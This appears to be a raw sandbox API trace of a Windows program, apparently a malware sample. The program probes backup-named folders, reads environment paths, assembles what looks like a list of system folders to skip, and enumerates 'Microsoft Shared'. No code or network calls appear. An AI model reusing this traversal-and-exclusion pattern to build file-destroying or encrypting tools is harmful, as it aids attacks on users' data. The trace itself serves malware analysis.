lpWideCharStr=0x18e10c, cchWideChar=2047 | out: lpWideCharStr="Archiveft SQL Server Compact Edition\\ition\\") returned 7 [0104.320] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Archive", lpFindFileData=0x18eec0 | out: lpFindFileData=0x18eec0*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x5500c4, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="ೊ였߿", cAlternateFileName="应W䱠@僬W企@\x18㟬X\x18\x81")) returned 0xffffffff [0104.320] GetLastError () returned 0x2 [0104.320] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\", cchLength=0x2f | out: lpsz="c:\\program files\\common files\\microsoft shared\\") returned 0x2f [0104.320] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea9480, cbMultiByte=7, lpWideCharStr=0x18e0c4, cchWideChar=2047 | out: lpWideCharStr="archiveX ") returned 7 [0104.320] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=6, lpWideCharStr=0x18e10c, cchWideChar=2047 | out: lpWideCharStr="Backupeft SQL Server Compact Edition\\ition\\") returned 6 [0104.320] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Backup", lpFindFileData=0x18eec0 | out: lpFindFileData=0x18eec0*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x5500c4, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="ೊ였߿", cAlternateFileName="应W䱠@佼W企@\x18㟄X\x18\x88")) returned 0xffffffff [0104.320] 
GetLastError () returned 0x2 [0104.320] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\", cchLength=0x2f | out: lpsz="c:\\program files\\common files\\microsoft shared\\") returned 0x2f [0104.320] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea9480, cbMultiByte=6, lpWideCharStr=0x18e0c4, cchWideChar=2047 | out: lpWideCharStr="backup㟨X ") returned 6 [0104.321] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=6, lpWideCharStr=0x18e10c, cchWideChar=2047 | out: lpWideCharStr="Reserveft SQL Server Compact Edition\\ition\\") returned 6 [0104.321] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Reserv", lpFindFileData=0x18eec0 | out: lpFindFileData=0x18eec0*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x5500c4, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="ೊ였߿", cAlternateFileName="应W䱠@㎌W企@\x18㟬X\x18\x8f")) returned 0xffffffff [0104.321] GetLastError () returned 0x2 [0104.321] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\", cchLength=0x2f | out: lpsz="c:\\program files\\common files\\microsoft shared\\") returned 0x2f [0104.321] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea9480, cbMultiByte=6, lpWideCharStr=0x18e0c4, cchWideChar=2047 | out: lpWideCharStr="reserv㟀X ") returned 6 [0104.321] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=7, lpWideCharStr=0x18e10c, cchWideChar=2047 | out: lpWideCharStr="Restoreft SQL Server Compact Edition\\ition\\") returned 7 [0104.321] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Restore", 
lpFindFileData=0x18eec0 | out: lpFindFileData=0x18eec0*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x5500c4, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="ೊ였߿", cAlternateFileName="应W䱠@僬W企@\x18㟄X\x18\x97")) returned 0xffffffff [0104.321] GetLastError () returned 0x2 [0104.322] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\", cchLength=0x2f | out: lpsz="c:\\program files\\common files\\microsoft shared\\") returned 0x2f [0104.322] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea9480, cbMultiByte=7, lpWideCharStr=0x18e0c4, cchWideChar=2047 | out: lpWideCharStr="restoreX ") returned 7 [0104.322] GlobalLock (hMem=0x450004) returned 0x58a000 [0104.322] GlobalHandle (pMem=0x58a000) returned 0x450004 [0104.322] GlobalUnlock (hMem=0x450004) returned 0 [0104.322] GlobalLock (hMem=0x450004) returned 0x58a000 [0104.322] GlobalLock (hMem=0x45000c) returned 0x591988 [0104.322] GlobalHandle (pMem=0x58a000) returned 0x450004 [0104.322] GlobalUnlock (hMem=0x450004) returned 0 [0104.322] GlobalHandle (pMem=0x591988) returned 0x45000c [0104.322] GlobalUnlock (hMem=0x45000c) returned 0 [0104.322] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\", cchLength=0x2f | out: lpsz="c:\\program files\\common files\\microsoft shared\\") returned 0x2f [0104.322] GetEnvironmentVariableA (in: lpName="ALLUSERSPROFILE", lpBuffer=0x18ecbc, nSize=0x400 | out: lpBuffer="C:\\ProgramData") returned 0xe [0104.322] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e9aae8, cbMultiByte=15, lpWideCharStr=0x18e0bc, cchWideChar=2047 | out: lpWideCharStr="c:\\programdata\\") returned 15 [0104.324] CharLowerBuffW (in: 
lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\", cchLength=0x2f | out: lpsz="c:\\program files\\common files\\microsoft shared\\") returned 0x2f [0104.324] GetEnvironmentVariableA (in: lpName="APPDATA", lpBuffer=0x18ecbc, nSize=0x400 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 0x2d [0104.324] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e79fe8, cbMultiByte=46, lpWideCharStr=0x18e0bc, cchWideChar=2047 | out: lpWideCharStr="c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\eft SQL Server Compact Edition\\ition\\") returned 46 [0104.324] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\", cchLength=0x2f | out: lpsz="c:\\program files\\common files\\microsoft shared\\") returned 0x2f [0104.324] GetEnvironmentVariableA (in: lpName="ProgramData", lpBuffer=0x18ecbc, nSize=0x400 | out: lpBuffer="C:\\ProgramData") returned 0xe [0104.324] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e9aa48, cbMultiByte=15, lpWideCharStr=0x18e0bc, cchWideChar=2047 | out: lpWideCharStr="c:\\programdata\\jn0js halpmcxz\\appdata\\roaming\\eft SQL Server Compact Edition\\ition\\") returned 15 [0104.324] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\", cchLength=0x2f | out: lpsz="c:\\program files\\common files\\microsoft shared\\") returned 0x2f [0104.324] GetEnvironmentVariableA (in: lpName="WINDIR", lpBuffer=0x18ecbc, nSize=0x400 | out: lpBuffer="C:\\Windows") returned 0xa [0104.325] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea9b88, cbMultiByte=11, lpWideCharStr=0x18e0bc, cchWideChar=2047 | out: lpWideCharStr="c:\\windows\\ata\\jn0js halpmcxz\\appdata\\roaming\\eft SQL Server Compact Edition\\ition\\") returned 11 [0104.325] GlobalLock (hMem=0x45000c) returned 0x58a000 [0104.325] GlobalHandle (pMem=0x58a000) returned 0x45000c [0104.325] GlobalUnlock (hMem=0x45000c) returned 0 [0104.325] GlobalLock 
(hMem=0x45000c) returned 0x58a000 [0104.325] GlobalLock (hMem=0x450004) returned 0x591988 [0104.325] GlobalHandle (pMem=0x58a000) returned 0x45000c [0104.325] GlobalUnlock (hMem=0x45000c) returned 0 [0104.325] GlobalHandle (pMem=0x591988) returned 0x450004 [0104.325] GlobalUnlock (hMem=0x450004) returned 0 [0104.325] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\", cchLength=0x2f | out: lpsz="c:\\program files\\common files\\microsoft shared\\") returned 0x2f [0104.325] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e9aa48, cbMultiByte=15, lpWideCharStr=0x18e0c4, cchWideChar=2047 | out: lpWideCharStr=":\\$recycle.bin\\s halpmcxz\\appdata\\roaming\\eft SQL Server Compact Edition\\ition\\") returned 15 [0104.325] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\", cchLength=0x2f | out: lpsz="c:\\program files\\common files\\microsoft shared\\") returned 0x2f [0104.325] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea9480, cbMultiByte=11, lpWideCharStr=0x18e0c4, cchWideChar=2047 | out: lpWideCharStr="\\all users\\bin\\s halpmcxz\\appdata\\roaming\\eft SQL Server Compact Edition\\ition\\") returned 11 [0104.326] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\", cchLength=0x2f | out: lpsz="c:\\program files\\common files\\microsoft shared\\") returned 0x2f [0104.326] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea9480, cbMultiByte=9, lpWideCharStr=0x18e0c4, cchWideChar=2047 | out: lpWideCharStr="\\appdata\\s\\bin\\s halpmcxz\\appdata\\roaming\\eft SQL Server Compact Edition\\ition\\") returned 9 [0104.326] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\", cchLength=0x2f | out: lpsz="c:\\program files\\common files\\microsoft shared\\") returned 0x2f [0104.326] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e9aa48, cbMultiByte=18, 
lpWideCharStr=0x18e0c4, cchWideChar=2047 | out: lpWideCharStr="\\application data\\alpmcxz\\appdata\\roaming\\eft SQL Server Compact Edition\\ition\\") returned 18 [0104.326] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\", cchLength=0x2f | out: lpsz="c:\\program files\\common files\\microsoft shared\\") returned 0x2f [0104.326] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=28, lpWideCharStr=0x18e0c4, cchWideChar=2047 | out: lpWideCharStr=":\\system volume information\\pdata\\roaming\\eft SQL Server Compact Edition\\ition\\") returned 28 [0104.326] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\", cchLength=0x2f | out: lpsz="c:\\program files\\common files\\microsoft shared\\") returned 0x2f [0104.326] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea9480, cbMultiByte=10, lpWideCharStr=0x18e0c4, cchWideChar=2047 | out: lpWideCharStr=":\\windows\\olume information\\pdata\\roaming\\eft SQL Server Compact Edition\\ition\\") returned 10 [0104.327] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\", cchLength=0x2f | out: lpsz="c:\\program files\\common files\\microsoft shared\\") returned 0x2f [0104.327] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea9480, cbMultiByte=8, lpWideCharStr=0x18e0c4, cchWideChar=2047 | out: lpWideCharStr=":\\intel\\s\\olume information\\pdata\\roaming\\eft SQL Server Compact Edition\\ition\\") returned 8 [0104.327] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\", cchLength=0x2f | out: lpsz="c:\\program files\\common files\\microsoft shared\\") returned 0x2f [0104.327] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea9480, cbMultiByte=9, lpWideCharStr=0x18e0c4, cchWideChar=2047 | out: lpWideCharStr=":\\nvidia\\\\olume information\\pdata\\roaming\\eft SQL Server Compact Edition\\ition\\") returned 9 
[0104.327] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\", cchLength=0x2f | out: lpsz="c:\\program files\\common files\\microsoft shared\\") returned 0x2f [0104.327] SHGetMalloc (in: ppMalloc=0x18f10c | out: ppMalloc=0x18f10c*=0x767666bc) returned 0x0 [0104.327] SHGetSpecialFolderLocation (in: hwnd=0x0, csidl=0, ppidl=0x18f108 | out: ppidl=0x18f108) returned 0x0 [0104.327] SHGetPathFromIDListW (in: pidl=0x578208, pszPath=0x57c6b4 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0104.328] SysReAllocStringLen (in: pbstr=0x18f190*=0x0, psz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", len=0x25 | out: pbstr=0x18f190*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0104.328] IMalloc:Free (This=0x767666bc, pv=0x578208) [0104.328] IUnknown:AddRef (This=0x767666bc) returned 0x1 [0104.328] CharLowerBuffW (in: lpsz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", cchLength=0x25 | out: lpsz="c:\\users\\5p5nrgjn0js halpmcxz\\desktop") returned 0x25 [0104.328] GlobalLock (hMem=0x450004) returned 0x58a000 [0104.328] GlobalHandle (pMem=0x58a000) returned 0x450004 [0104.329] GlobalUnlock (hMem=0x450004) returned 0 [0104.329] GlobalLock (hMem=0x450004) returned 0x58a000 [0104.329] GlobalLock (hMem=0x45000c) returned 0x591988 [0104.329] GlobalHandle (pMem=0x58a000) returned 0x450004 [0104.329] GlobalUnlock (hMem=0x450004) returned 0 [0104.329] GlobalHandle (pMem=0x591988) returned 0x45000c [0104.329] GlobalUnlock (hMem=0x45000c) returned 0 [0104.329] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\*.*", lpFindFileData=0x18f1e4 | out: lpFindFileData=0x18f1e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7545b2, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x81afcd40, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x81afcd40, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, 
dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x587720 [0104.329] FindNextFileW (in: hFindFile=0x587720, lpFindFileData=0x18f1e4 | out: lpFindFileData=0x18f1e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7545b2, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x81afcd40, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x81afcd40, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0104.329] FindNextFileW (in: hFindFile=0x587720, lpFindFileData=0x18f1e4 | out: lpFindFileData=0x18f1e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51e19d30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xdbe166c0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xdbe166c0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="DW", cAlternateFileName="")) returned 1 [0104.329] FindNextFileW (in: hFindFile=0x587720, lpFindFileData=0x18f1e4 | out: lpFindFileData=0x18f1e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeed38550, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeef015d0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeef015d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="EQUATION", cAlternateFileName="")) returned 1 [0104.329] FindNextFileW (in: hFindFile=0x587720, lpFindFileData=0x18f1e4 | out: lpFindFileData=0x18f1e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x58c7d970, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x58c7d970, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x58c7d970, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, 
nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="EURO", cAlternateFileName="")) returned 1 [0104.329] FindNextFileW (in: hFindFile=0x587720, lpFindFileData=0x18f1e4 | out: lpFindFileData=0x18f1e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5969b6f0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xd9df3dc0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xd9df3dc0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Filters", cAlternateFileName="")) returned 1 [0104.329] FindNextFileW (in: hFindFile=0x587720, lpFindFileData=0x18f1e4 | out: lpFindFileData=0x18f1e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeec79e70, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xc25b4860, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xc25b4860, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="GRPHFLT", cAlternateFileName="")) returned 1 [0104.329] FindNextFileW (in: hFindFile=0x587720, lpFindFileData=0x18f1e4 | out: lpFindFileData=0x18f1e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee282250, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x61073d10, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x61073d10, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Help", cAlternateFileName="")) returned 1 [0104.329] FindNextFileW (in: hFindFile=0x587720, lpFindFileData=0x18f1e4 | out: lpFindFileData=0x18f1e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7545b2, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x9e0df36a, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9e0df36a, 
ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ink", cAlternateFileName="")) returned 1 [0104.329] FindNextFileW (in: hFindFile=0x587720, lpFindFileData=0x18f1e4 | out: lpFindFileData=0x18f1e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x69dc9750, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x69dc9750, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x69dc9750, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSClientDataMgr", cAlternateFileName="MSCLIE~1")) returned 1 [0104.329] FindNextFileW (in: hFindFile=0x587720, lpFindFileData=0x18f1e4 | out: lpFindFileData=0x18f1e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd838dce, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x1eab37af, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSInfo", cAlternateFileName="")) returned 1 [0104.329] FindNextFileW (in: hFindFile=0x587720, lpFindFileData=0x18f1e4 | out: lpFindFileData=0x18f1e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee282250, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe5d93940, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe5d93940, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="OFFICE14", cAlternateFileName="")) returned 1 [0104.329] FindNextFileW (in: hFindFile=0x587720, lpFindFileData=0x18f1e4 | out: lpFindFileData=0x18f1e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50e54b70, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6c23c830, 
ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6c23c830, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="OfficeSoftwareProtectionPlatform", cAlternateFileName="OFFICE~1")) returned 1 [0104.329] FindNextFileW (in: hFindFile=0x587720, lpFindFileData=0x18f1e4 | out: lpFindFileData=0x18f1e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5b0da70, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x69e61cd0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x69e61cd0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PROOF", cAlternateFileName="")) returned 1 [0104.329] FindNextFileW (in: hFindFile=0x587720, lpFindFileData=0x18f1e4 | out: lpFindFileData=0x18f1e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeed123f0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xd5807780, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xd5807780, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Smart Tag", cAlternateFileName="SMARTT~1")) returned 1 [0104.329] FindNextFileW (in: hFindFile=0x587720, lpFindFileData=0x18f1e4 | out: lpFindFileData=0x18f1e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeef4d890, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeef4d890, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeef4d890, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Source Engine", cAlternateFileName="SOURCE~1")) returned 1 [0104.329] FindNextFileW (in: hFindFile=0x587720, lpFindFileData=0x18f1e4 | out: lpFindFileData=0x18f1e4*(dwFileAttributes=0x10, 
ftCreationTime.dwLowDateTime=0xfd85ef28, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x9e177d26, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9e177d26, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Stationery", cAlternateFileName="STATIO~1")) returned 1 [0104.329] FindNextFileW (in: hFindFile=0x587720, lpFindFileData=0x18f1e4 | out: lpFindFileData=0x18f1e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0xcf4f23c0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xcf4f23c0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="TextConv", cAlternateFileName="")) returned 1 [0104.330] FindNextFileW (in: hFindFile=0x587720, lpFindFileData=0x18f1e4 | out: lpFindFileData=0x18f1e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x512f1610, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d462ff0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d462ff0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="THEMES14", cAlternateFileName="")) returned 1 [0104.330] FindNextFileW (in: hFindFile=0x587720, lpFindFileData=0x18f1e4 | out: lpFindFileData=0x18f1e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x54a7f50, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x69dc9750, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x69dc9750, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="TRANSLAT", cAlternateFileName="")) returned 1 [0104.330] FindNextFileW (in: hFindFile=0x587720, lpFindFileData=0x18f1e4 | out: 
lpFindFileData=0x18f1e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eab37af, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x1eab37af, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Triedit", cAlternateFileName="")) returned 1 [0104.330] FindNextFileW (in: hFindFile=0x587720, lpFindFileData=0x18f1e4 | out: lpFindFileData=0x18f1e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeedaa970, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeedaa970, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeedaa970, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="VBA", cAlternateFileName="")) returned 1 [0104.330] FindNextFileW (in: hFindFile=0x587720, lpFindFileData=0x18f1e4 | out: lpFindFileData=0x18f1e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd2c6940, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xd250e300, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xd250e300, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="VC", cAlternateFileName="")) returned 1 [0104.330] FindNextFileW (in: hFindFile=0x587720, lpFindFileData=0x18f1e4 | out: 